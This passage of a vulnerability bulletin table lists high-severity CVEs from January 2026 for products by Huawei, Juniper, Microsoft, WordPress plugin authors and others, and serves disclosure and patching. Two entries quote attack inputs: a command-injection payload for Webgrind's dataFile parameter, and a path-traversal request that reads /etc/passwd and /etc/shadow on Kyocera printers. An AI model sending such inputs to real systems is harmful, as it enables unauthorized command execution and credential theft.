| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the card framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8 | CVE-2025-68958 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the video framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 8.4 | CVE-2025-68960 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Double free vulnerability in the multi-mode input module. Impact: Successful exploitation of this vulnerability may affect the input function. | 2026-01-14 | 7.8 | CVE-2025-68968 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| I-Funbox--iFunbox | iFunbox 4.2 contains an unquoted service path vulnerability in the Apple Mobile Device Service that allows local attackers to execute code with elevated privileges. Attackers can insert a malicious executable into the unquoted service path to run with LocalSystem privileges when the service restarts. | 2026-01-15 | 7.8 | CVE-2021-47803 | ExploitDB-50040 iFunbox Official Homepage VulnCheck Advisory: iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path |
| ilwebmaster21--WOW21 | WOW21 5.0.1.9 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50921 | ExploitDB-50818 Archived Product Homepage VulnCheck Advisory: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path |
| ImpressCMS--ImpressCMS | ImpressCMS 1.4.4 contains a file upload vulnerability with weak extension sanitization that allows attackers to upload potentially malicious files. Attackers can bypass file upload restrictions by using alternative file extensions (.php2, .php6, .php7, .phps, .pht) to execute arbitrary PHP code on the server. | 2026-01-13 | 9.8 | CVE-2022-50912 | ExploitDB-50890 Official ImpressCMS Homepage ImpressCMS GitHub Repository VulnCheck Advisory: ImpressCMS 1.4.4 - Unrestricted File Upload |
| Inbit--Inbit Messenger | Inbit Messenger 4.6.0 - 4.9.0 contains a remote command execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by exploiting a stack overflow in the messenger's protocol. Attackers can send specially crafted XML packets to port 10883 with a malicious payload to trigger the vulnerability and execute commands with system privileges. | 2026-01-13 | 9.8 | CVE-2023-54329 | ExploitDB-51127 Archived Software Download Page Exploit Write-Up VulnCheck Advisory: Inbit Messenger 4.9.0 - Unauthenticated Remote Command Execution (RCE) |
| Inbit--Inbit Messenger | Inbit Messenger versions 4.6.0 to 4.9.0 contain a remote stack-based buffer overflow vulnerability that allows unauthenticated attackers to execute arbitrary code by sending malformed network packets. Attackers can craft a specially designed payload targeting the messenger's network handler to overwrite the Structured Exception Handler (SEH) and execute shellcode on vulnerable Windows systems. | 2026-01-13 | 9.8 | CVE-2023-54330 | ExploitDB-51126 Archived Software Download Page Exploit Write-Up VulnCheck Advisory: Inbit Messenger 4.9.0 - Unauthenticated Remote SEH Overflow |
| Infonetsoftware--Mediconta | Mediconta 3.7.27 contains an unquoted service path vulnerability in the servermedicontservice that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files (x86)\medicont3\ to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2023-54336 | ExploitDB-51064 Vendor Homepage VulnCheck Advisory: Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path |
| Insyde Software--InsydeH2O tools | The drivers in the tool packages use the RTL_QUERY_REGISTRY_DIRECT flag to read a registry value; an untrusted user-mode application that can control that value may be able to cause a buffer overflow. | 2026-01-14 | 7.8 | CVE-2025-12050 | https://www.insyde.com/security-pledge/sa-2025010/ |
| Insyde Software--InsydeH2O tools | The drivers in the tool packages use the RTL_QUERY_REGISTRY_DIRECT flag to read a registry value; an untrusted user-mode application that can control that value may be able to cause a buffer overflow. | 2026-01-14 | 7.8 | CVE-2025-12051 | https://www.insyde.com/security-pledge/sa-2025010/ |
| Insyde Software--InsydeH2O tools | The drivers in the tool packages use the RTL_QUERY_REGISTRY_DIRECT flag to read a registry value; an untrusted user-mode application that can control that value may be able to cause a buffer overflow. | 2026-01-14 | 7.8 | CVE-2025-12052 | https://www.insyde.com/security-pledge/sa-2025010/ |
| Insyde Software--InsydeH2O tools | The drivers in the tool packages use the RTL_QUERY_REGISTRY_DIRECT flag to read a registry value; an untrusted user-mode application that can control that value may be able to cause a buffer overflow. | 2026-01-14 | 7.8 | CVE-2025-12053 | https://www.insyde.com/security-pledge/sa-2025010/ |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Prior to 2.3.1.2, there is a heap-based buffer overflow in SIccCalcOp::Describe() at IccProfLib/IccMpeCalc.cpp. This vulnerability affects users of the iccDEV library who process ICC color profiles. The vulnerability is fixed in 2.3.1.2. | 2026-01-13 | 8.8 | CVE-2026-22861 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-vr49-3vf8-7j5h https://github.com/InternationalColorConsortium/iccDEV/pull/475 https://github.com/InternationalColorConsortium/iccDEV/pull/476 https://github.com/InternationalColorConsortium/iccDEV/commit/fa9a364c01fc2e59eb2291e1f9b1c1359b7d5329 |
| ITEC--TCQ | ITeC ITeCProteccioAppServer contains an unquoted service path vulnerability that allows local attackers to execute code with elevated system privileges. Attackers can insert a malicious executable in the service path to gain elevated access during service restart or system reboot. | 2026-01-13 | 8.4 | CVE-2022-50913 | ExploitDB-50902 Vendor Homepage VulnCheck Advisory: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path |
| itsourcecode--Society Management System | A flaw has been found in itsourcecode Society Management System 1.0. The affected element is an unknown function of the file /admin/delete_activity.php. Executing a manipulation of the argument activity_id can lead to SQL injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-01-18 | 7.3 | CVE-2026-1119 | VDB-341711 \| itsourcecode Society Management System delete_activity.php sql injection VDB-341711 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734290 \| itsourcecode Society Management System V1.0 SQL injection https://github.com/AriazzzZ/CVE/issues/1 https://itsourcecode.com/ |
| IVT Corp--Bluetooth Application BlueSoleilCS | BlueSoleilCS 5.4.277 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path in 'C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleilCS.exe' to inject malicious executables and escalate privileges. | 2026-01-13 | 8.4 | CVE-2022-50928 | ExploitDB-50761 Archived IVT Corporation Website VulnCheck Advisory: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path |
| jeroenpeters1986--Name Directory | The Name Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name_directory_name' and 'name_directory_description' parameters in all versions up to, and including, 1.30.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 7.2 | CVE-2025-15283 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3c9de67e-24f7-4c4a-b187-405597b838c3?source=cve https://plugins.trac.wordpress.org/browser/name-directory/tags/1.30.3/shortcode.php?marks=38,41,69#L38 https://plugins.trac.wordpress.org/browser/name-directory/tags/1.30.3/admin.php?marks=927-928#L927 |
| jokkedk--Webgrind | Webgrind 1.1 contains a remote command execution vulnerability that allows unauthenticated attackers to inject OS commands via the dataFile parameter in index.php. Attackers can execute arbitrary system commands by manipulating the dataFile parameter, such as using payload '0%27%26calc.exe%26%27' to execute commands on the target system. | 2026-01-13 | 9.8 | CVE-2023-54339 | ExploitDB-51074 Webgrind GitHub Repository VulnCheck Advisory: Webgrind 1.1 - Remote Command Execution (RCE) via dataFile Parameter |
| jotron--StudyMD | StudyMD 0.3.2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution. | 2026-01-16 | 7.2 | CVE-2021-47842 | ExploitDB-49832 StudyMD GitHub Repository Proof of Concept Video VulnCheck Advisory: StudyMD 0.3.2 - Persistent Cross-Site Scripting |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the Juniper DHCP service (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows a DHCP client in one subnet to exhaust the address pools of other subnets, leading to a Denial of Service (DoS) on the downstream DHCP server. By default, the DHCP relay agent inserts its own Option 82 information when forwarding client requests, optionally replacing any Option 82 information provided by the client. When a specific DHCP DISCOVER is received in 'forward-only' mode with Option 82, the device should drop the message unless 'trust-option82' is configured. Instead, the DHCP relay forwards these packets to the DHCP server unmodified, which uses up addresses in the DHCP server's address pool, ultimately leading to address pool exhaustion. This issue affects Junos OS: * all versions before 21.2R3-S10, * from 21.4 before 21.4R3-S12, * all versions of 22.2, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S2, * from 24.4 before 24.4R2, * from 25.2 before 25.2R1-S1, 25.2R2. Junos OS Evolved: * all versions before 21.4R3-S12-EVO, * all versions of 22.2-EVO, * from 22.4 before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-S2-EVO, * from 24.4 before 24.4R2-EVO, * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO. | 2026-01-15 | 7.4 | CVE-2025-59960 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103149 |
| Juniper Networks--Junos OS | A Buffer Over-read vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). When an affected device receives a BGP update with a set of specific optional transitive attributes over an established peering session, rpd will crash and restart when attempting to advertise the received information to another peer. This issue can only happen if one or both of the BGP peers of the receiving session are non-4-byte-AS capable as determined from the advertised capabilities during BGP session establishment. Junos OS and Junos OS Evolved default behavior is 4-byte-AS capable unless this has been specifically disabled by configuring: `[ protocols bgp ... disable-4byte-as ]` Established BGP sessions can be checked by executing: `show bgp neighbor <IP address> \| match "4 byte AS"` This issue affects: Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * 23.2 versions before 23.2R2-S5-EVO, * 23.4 versions before 23.4R2-S6-EVO, * 24.2 versions before 24.2R2-S2-EVO, * 24.4 versions before 24.4R2-EVO. | 2026-01-15 | 7.5 | CVE-2025-60003 | https://supportportal.juniper.net/ https://kb.juniper.net/JSA103166 |
| Juniper Networks--Junos OS | A Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in the SIP application layer gateway (ALG) of Juniper Networks Junos OS on SRX Series and MX Series with MX-SPC3 or MS-MPC allows an unauthenticated network-based attacker sending specific SIP messages over TCP to crash the flow management process, leading to a Denial of Service (DoS). On SRX Series, and MX Series with MX-SPC3 or MS-MPC service cards, receipt of multiple SIP messages causes the SIP headers to be parsed incorrectly, eventually causing a continuous loop and leading to a watchdog timer expiration, crashing the flowd process on SRX Series and MX Series with MX-SPC3, or mspmand process on MX Series with MS-MPC. This issue only occurs over TCP. SIP messages sent over UDP cannot trigger this issue. This issue affects Junos OS on SRX Series and MX Series with MX-SPC3 and MS-MPC: * all versions before 21.2R3-S10, * from 21.4 before 21.4R3-S12, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S1, * from 25.2 before 25.2R1-S1, 25.2R2. | 2026-01-15 | 7.5 | CVE-2026-21905 | https://supportportal.juniper.net/JSA106004 https://kb.juniper.net/JSA106004 |
| Juniper Networks--Junos OS | An Improper Handling of Exceptional Conditions vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated network-based attacker sending a specific ICMP packet through a GRE tunnel to cause the PFE to crash and restart. When PowerMode IPsec (PMI) and GRE performance acceleration are enabled and the device receives a specific ICMP packet, a crash occurs in the SRX PFE, resulting in traffic loss. PMI is enabled by default, and GRE performance acceleration can be enabled by running the configuration command shown below. PMI is a mode of operation that provides IPsec performance improvements using Vector Packet Processing. Note that PMI with GRE performance acceleration is only supported on specific SRX platforms. This issue affects Junos OS on the SRX Series: * all versions before 21.4R3-S12, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S5, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S1, * from 25.2 before 25.2R1-S1, 25.2R2. | 2026-01-15 | 7.5 | CVE-2026-21906 | https://supportportal.juniper.net/JSA106005 https://www.juniper.net/documentation/us/en/software/junos/vpn-ipsec/topics/topic-map/security-powermode-ipsec-vpn.html https://kb.juniper.net/JSA106005 |
| Juniper Networks--Junos OS | A Use After Free vulnerability was identified in the 802.1X authentication daemon (dot1xd) of Juniper Networks Junos OS and Junos OS Evolved that could allow an authenticated, network-adjacent attacker flapping a port to crash the dot1xd process, leading to a Denial of Service (DoS), or potentially execute arbitrary code within the context of the process running as root. The issue is specific to the processing of a change in authorization (CoA) when a port bounce occurs. A pointer is freed but was then referenced later in the same code path. Successful exploitation is outside the attacker's direct control due to the specific timing of the two events required to execute the vulnerable code path. This issue affects systems with 802.1X authentication port-based network access control (PNAC) enabled. This issue affects: Junos OS: * from 23.2R2-S1 before 23.2R2-S5, * from 23.4R2 before 23.4R2-S6, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S1, * from 25.2 before 25.2R1-S2, 25.2R2; Junos OS Evolved: * from 23.2R2-S1 before 23.2R2-S5-EVO, * from 23.4R2 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-S3-EVO, * from 24.4 before 24.4R2-S1-EVO, * from 25.2 before 25.2R1-S2-EVO, 25.2R2-EVO. | 2026-01-15 | 7.1 | CVE-2026-21908 | https://supportportal.juniper.net/JSA106007 https://kb.juniper.net/JSA106007 |
| Juniper Networks--Junos OS | An Incorrect Initialization of Resource vulnerability in the Internal Device Manager (IDM) of Juniper Networks Junos OS on EX4000 models allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). On EX4000 models with 48 ports (EX4000-48T, EX4000-48P, EX4000-48MP) a high volume of traffic destined to the device will cause an FXPC crash and restart, which leads to a complete service outage until the device has automatically restarted. The following reboot reason can be seen in the output of 'show chassis routing-engine' and as a log message: reason=0x4000002 reason_string=0x4000002:watchdog + panic with core dump This issue affects Junos OS on EX4000-48T, EX4000-48P and EX4000-48MP: * 24.4 versions before 24.4R2, * 25.2 versions before 25.2R1-S2, 25.2R2. This issue does not affect versions before 24.4R1 as the first Junos OS version for the EX4000 models was 24.4R1. | 2026-01-15 | 7.5 | CVE-2026-21913 | https://supportportal.juniper.net/JSA106014 https://kb.juniper.net/JSA106014 |
| Juniper Networks--Junos OS | An Improper Locking vulnerability in the GTP plugin of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). If an SRX Series device receives a specifically malformed GPRS Tunnelling Protocol (GTP) Modify Bearer Request message, a lock is acquired and never released. This results in other threads not being able to acquire a lock themselves, causing a watchdog timeout leading to FPC crash and restart. This issue leads to a complete traffic outage until the device has automatically recovered. This issue affects Junos OS on SRX Series: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions before 25.2R1-S1, 25.2R2. | 2026-01-15 | 7.5 | CVE-2026-21914 | https://supportportal.juniper.net/JSA106015 https://kb.juniper.net/JSA106015 |
| Juniper Networks--Junos OS | An Improper Validation of Syntactic Correctness of Input vulnerability in the Web-Filtering module of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). If an SRX device configured for UTM Web-Filtering receives a specifically malformed SSL packet, this will cause an FPC crash and restart. This issue affects Junos OS on SRX Series: * 23.2 versions from 23.2R2-S2 before 23.2R2-S5, * 23.4 versions from 23.4R2-S1 before 23.4R2-S5, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R1-S3, 24.4R2. Earlier versions of Junos are also affected, but no fix is available. | 2026-01-15 | 7.5 | CVE-2026-21917 | https://supportportal.juniper.net/JSA105996 https://kb.juniper.net/JSA105996 |
| Juniper Networks--Junos OS | A Double Free vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on SRX and MX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). On all SRX and MX Series platforms, when during TCP session establishment a specific sequence of packets is encountered a double free happens. This causes flowd to crash and the respective FPC to restart. This issue affects Junos OS on SRX and MX Series: * all versions before 22.4R3-S7, * 23.2 versions before 23.2R2-S3, * 23.4 versions before 23.4R2-S4, * 24.2 versions before 24.2R2. | 2026-01-15 | 7.5 | CVE-2026-21918 | https://supportportal.juniper.net/JSA106018 https://kb.juniper.net/JSA106018 |
| Juniper Networks--Junos OS | An Unchecked Return Value vulnerability in the DNS module of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). If an SRX Series device configured for DNS processing receives a specifically formatted DNS request, flowd will crash and restart, which causes a service interruption until the process has recovered. This issue affects Junos OS on SRX Series: * 23.4 versions before 23.4R2-S5, * 24.2 versions before 24.2R2-S1, * 24.4 versions before 24.4R2. This issue does not affect Junos OS versions before 23.4R1. | 2026-01-15 | 7.5 | CVE-2026-21920 | https://supportportal.juniper.net/JSA106020 https://kb.juniper.net/JSA106020 |
| kalyan02--NanoCMS | NanoCMS 0.4 contains an authenticated file upload vulnerability that allows remote code execution through unvalidated page content creation. Authenticated attackers can upload PHP files with arbitrary code to the server's pages directory by exploiting the page creation mechanism without proper input sanitization. | 2026-01-13 | 8.8 | CVE-2022-50898 | ExploitDB-50997 NanoCMS GitHub Repository NanoCMS Exploit Archive VulnCheck Advisory: NanoCMS 0.4 - Remote Code Execution (RCE) (Authenticated) |
| kraftplugins--Demo Importer Plus | The Demo Importer Plus plugin for WordPress is vulnerable to XML External Entity Injection (XXE) in all versions up to, and including, 2.0.9 via the SVG file upload functionality. This makes it possible for authenticated attackers, with Author-level access and above, to achieve code execution in vulnerable configurations. This only impacts sites on versions of PHP older than 8.0. | 2026-01-17 | 7.5 | CVE-2025-14478 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b2971aa0-8287-4142-bd04-7aec1ed92e7b?source=cve https://plugins.trac.wordpress.org/browser/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php#L88 https://plugins.trac.wordpress.org/browser/demo-importer-plus/tags/2.0.6/inc/importers/class-demo-importer-plus-sites-helper.php#L88 https://plugins.trac.wordpress.org/changeset/3439643/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php |
| KYOCERA Document Solutions--Kyocera Command Center RX | Kyocera Command Center RX ECOSYS M2035dn contains a directory traversal vulnerability that allows unauthenticated attackers to read sensitive system files by manipulating file paths under the /js/ path. Attackers can exploit the issue by sending requests like /js/../../../../.../etc/passwd%00.jpg (null-byte appended traversal) to access critical files such as /etc/passwd and /etc/shadow. | 2026-01-13 | 7.5 | CVE-2022-50932 | ExploitDB-50738 Kyocera Command Center RX Official Product Page VulnCheck Advisory: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) |
| LabRedesCefetRJ--WeGIA | WeGIA is a Web Manager for Charitable Institutions. Prior to 3.6.2, a Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the WeGIA system, specifically within the html/memorando/insere_despacho.php file. The application fails to properly sanitize or encode user-supplied input via the id_memorando GET parameter before reflecting it into the HTML source (likely inside a `<script>` block or an attribute). This allows unauthenticated attackers to inject arbitrary JavaScript or HTML into the context of the user's browser session. This vulnerability is fixed in 3.6.2. | 2026-01-16 | 9.1 | CVE-2026-23722 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an authenticated SQL Injection vulnerability was identified in the Atendido_ocorrenciaControle endpoint via the id_memorando parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments. This vulnerability is fixed in 3.6.2. | 2026-01-16 | 7.2 | CVE-2026-23723 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| Laravel--Laravel Valet | Laravel Valet versions 1.1.4 to 2.0.3 contain a local privilege escalation vulnerability that allows users to modify the valet command with root privileges. Attackers can edit the symlinked valet command to execute arbitrary code with root permissions without additional authentication. | 2026-01-15 | 8.4 | CVE-2021-47756 | ExploitDB-50591 Laravel Valet Official Documentation VulnCheck Advisory: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS) |
| Leawo--Leawo Prof. Media | Leawo Prof. Media 11.0.0.1 contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized payload in the activation keycode field. Attackers can generate a 6000-byte buffer of repeated characters to trigger an application crash when pasted into the registration interface. | 2026-01-15 | 7.5 | CVE-2021-47797 | ExploitDB-50153 Vendor Homepage VulnCheck Advisory: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC) |
| lemonldap-ng--LemonLDAP::NG | In the portal in LemonLDAP::NG before 2.21.0, cross-site scripting (XSS) allows remote attackers to inject arbitrary web script or HTML (into the login page) via the tab parameter, for Choice authentication. | 2026-01-16 | 7.2 | CVE-2025-31510 | https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3341 |
| Lenovo--ThinkPlus FU100 | A vulnerability was reported in ThinkPlus configuration software that could allow a local authenticated user to bypass ThinkPlus device authentication and enroll an untrusted fingerprint. | 2026-01-14 | 7.8 | CVE-2025-13455 | https://iknow.lenovo.com.cn/detail/436983 |
| Levelprograms--Kmaleon | Kmaleon 1.1.0.205 contains an authenticated SQL injection vulnerability in the 'tipocomb' parameter of kmaleonW.php that allows attackers to manipulate database queries. Attackers can exploit this vulnerability using boolean-based, error-based, and time-based blind SQL injection techniques to potentially extract or manipulate database information. | 2026-01-15 | 7.1 | CVE-2021-47766 | ExploitDB-50499 Archived Kmaleon Software Product Page |
| Litexmedia--Audio Conversion Wizard | Audio Conversion Wizard v2.01 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code by overwriting memory with a specially crafted registration code. Attackers can generate a payload that overwrites the application's memory stack, potentially enabling remote code execution through a carefully constructed input buffer. | 2026-01-13 | 9.8 | CVE-2022-50922 | ExploitDB-50811 Audio Wizard Product Webpage VulnCheck Advisory: Audio Conversion Wizard v2.01 - Buffer Overflow |
| Litexmedia--YouTube Video Grabber | YouTube Video Grabber, now referred to as YouTube Downloader, 1.9.9.1 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code by overwriting the Structured Exception Handler. Attackers can craft a malicious payload of 712 bytes with SEH manipulation to trigger a bind shell connection on a specified local port. | 2026-01-15 | 8.4 | CVE-2021-47775 | ExploitDB-50471 Product Webpage |
| Macro-Expert--Macro Expert | Macro Expert 4.7 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the improperly configured service path to inject malicious executables that will be run with LocalSystem permissions during service startup. | 2026-01-15 | 7.8 | CVE-2021-47780 | ExploitDB-50431 Macro Expert Official Website VulnCheck Advisory: Macro Expert 4.7 - Unquoted Service Path |
| Mailhog--Mailhog | Mailhog 1.0.1 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through email attachments. Attackers can send crafted emails with XSS payloads to execute arbitrary API calls, including message deletion and browser manipulation. | 2026-01-13 | 7.2 | CVE-2022-50908 | ExploitDB-50971 MailHog GitHub Repository Shodan Search Results for MailHog VulnCheck Advisory: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS) |
| Malavida--Cain & Abel | Cain & Abel 4.9.56 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions. | 2026-01-13 | 8.4 | CVE-2022-50933 | ExploitDB-50728 Official Software Download Page VulnCheck Advisory: Cain & Abel 4.9.56 - Unquoted Service Path |
| MCPJam--inspector | MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier contain a remote code execution (RCE) vulnerability that allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch. | 2026-01-16 | 9.8 | CVE-2026-23744 | https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6 https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a |
| MegaTKC--Aero CMS | Aero CMS 0.0.1 contains a SQL injection vulnerability in the author parameter that allows attackers to manipulate database queries. Attackers can exploit boolean-based, error-based, time-based, and UNION query techniques to extract sensitive database information and potentially compromise the system. | 2026-01-13 | 8.2 | CVE-2022-50895 | ExploitDB-51022 Archived AeroCMS GitHub Repository Vulnerability Research Repository VulnCheck Advisory: Aero CMS 0.0.1 - SQL Injection |
| Merit LILIN--DH032 | Certain DVR/NVR models developed by Merit LILIN have an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the device. | 2026-01-12 | 8.8 | CVE-2026-0854 | https://www.twcert.org.tw/tw/cp-132-10624-6599c-1.html https://www.twcert.org.tw/en/cp-139-10623-4f523-2.html |
| Merit LILIN--P2 | Certain IP Camera models developed by Merit LILIN have an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the device. | 2026-01-12 | 8.8 | CVE-2026-0855 | https://www.twcert.org.tw/tw/cp-132-10625-fac5c-1.html https://www.twcert.org.tw/en/cp-139-10626-afbe2-2.html |
| metagauss--RegistrationMagic Custom Registration Forms, User Registration, Payment, and User Login | The RegistrationMagic plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.0.7.1. This is due to the 'add_menu' function being accessible via the 'rm_user_exists' AJAX action and allowing arbitrary updates to the 'admin_order' setting. This makes it possible for unauthenticated attackers to inject an empty slug into the order parameter and manipulate the plugin's menu generation logic; when the admin menu is subsequently built, the plugin adds the 'manage_options' capability for the target role. Note: The vulnerability can only be exploited unauthenticated, but further privilege escalation requires at least a subscriber user. | 2026-01-17 | 9.8 | CVE-2025-15403 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68dd9f6f-ccee-4a27-bd21-2fb32b92cc62?source=cve https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/controllers/class_rm_options_controller.php#L562 https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/class_rm_admin.php#L487 https://plugins.trac.wordpress.org/changeset/3440797/custom-registration-form-builder-with-submission-manager#file2 |
| Microsoft--Azure Connected Machine Agent | Stack-based buffer overflow in Azure Connected Machine Agent allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-21224 | Azure Connected Machine Agent Elevation of Privilege Vulnerability |
| Microsoft--Azure Core shared client library for Python | Deserialization of untrusted data in Azure Core shared client library for Python allows an authorized attacker to execute code over a network. | 2026-01-13 | 7.5 | CVE-2026-21226 | Azure Core shared client library for Python Remote Code Execution Vulnerability |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-01-13 | 8.4 | CVE-2026-20944 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Microsoft 365 Apps for Enterprise | Improper access control in Microsoft Office Excel allows an unauthorized attacker to bypass a security feature locally. | 2026-01-13 | 7.8 | CVE-2026-20949 | Microsoft Excel Security Feature Bypass Vulnerability |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20956 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office 2019 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-01-13 | 8.4 | CVE-2026-20952 | Microsoft Office Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office 2019 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-01-13 | 8.4 | CVE-2026-20953 | Microsoft Office Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office 2019 | Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20946 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft Power Apps | Improper authorization in Microsoft Power Apps allows an authorized attacker to execute code over a network. | 2026-01-16 | 8 | CVE-2026-20960 | Microsoft Power Apps Remote Code Execution Vulnerability |
